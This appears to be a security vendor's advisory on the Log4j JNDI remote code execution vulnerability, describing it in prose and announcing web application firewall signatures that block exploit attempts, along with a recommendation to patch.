Details of the vulnerability
Log4j is a Java-based logging audit framework within Apache. Apache Log4j <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The vulnerability impacts default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are utilized by numerous organizations from Apple, Amazon, Cloudflare, Twitter, Steam, and others.
The vulnerability is triggered by sending a specific string to the log4j software, which means it is simple to exploit. The broad utilization of this software means there are multiple attack vectors. For the past few days, we have seen attackers increasingly obfuscate their reconnaissance and exploit attempts for this vulnerability.
Attack detection and protection
We are rolling out new signatures to detect the log4j exploit attempts and block them. These signatures have been updated to handle the latest evasions seen in the field on December 13, 2021. These signatures and settings will block both GET and POST requests attempting this exploit.
Web Application Firewall & CloudGen WAF
The latest signatures for this vulnerability are being rolled out to units in the field. These signatures and settings will block both GET and POST requests attempting this exploit. While these signatures detect variations that have been seen so far, we continue to update them as newer variants pop up. As a best practice, we recommend patching your log4j installations to the latest versions that have this issue fixed.